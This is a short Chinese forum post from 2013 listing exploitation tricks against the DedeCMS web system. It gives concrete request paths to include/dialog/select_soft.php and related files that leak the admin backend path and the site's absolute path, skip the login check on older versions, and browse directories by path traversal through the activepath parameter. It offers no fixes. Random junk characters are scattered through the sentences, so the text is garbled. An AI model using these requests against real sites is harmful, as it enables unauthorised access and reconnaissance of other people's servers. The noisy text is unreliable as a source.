1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理1 D- v" `' X7 O
2 Z% J: f" j3 v, R
员帐号,新版本的就直接转向了后台.
2 ?/ V; W9 U: ]
3 M! }% H3 T$ Q3 D1 n0 s2.include/dialog/config.php会爆出后台管理路径
0 N4 f, H* q& u/ M5 U/ q4 j2 F! G3 m* ]
3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录
I; c1 ~+ ~4 P7 P0 }6 D( E3 O0 Y% n+ U" G
4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.
' a% w3 `! [8 @: n4 l0 n) H' S7 O2 z, U2 e
5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉+ L, D: n a' \0 L4 e: O( \
$ s; H' _3 x" b8 l1 n: i到根目录去.不过这些版本的访问地址有些不同." Q; _0 P' z/ r5 o5 a- c- u
地址为require/dialog/select_soft.php?activepath=/././././././././" q' I$ u A7 P+ O+ k
C1 h! O. }' M3 _: f
include\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..
9 b% i: q2 ]( s+ v( u& `: h1 ?存在相同问题的文件还有! i" [$ x4 b- i n, L# X6 P; }. I# N
include\dialog\select_images.php6 G( ? C% J; O
include\dialog\select_media.php
; N2 D; N; c. Xinclude\dialog\select_templets.php
2 J2 b8 [$ E/ @4 e3 u2 n4 a |
发表于 2013-4-16 16:50:43
收藏
分享
支持
反对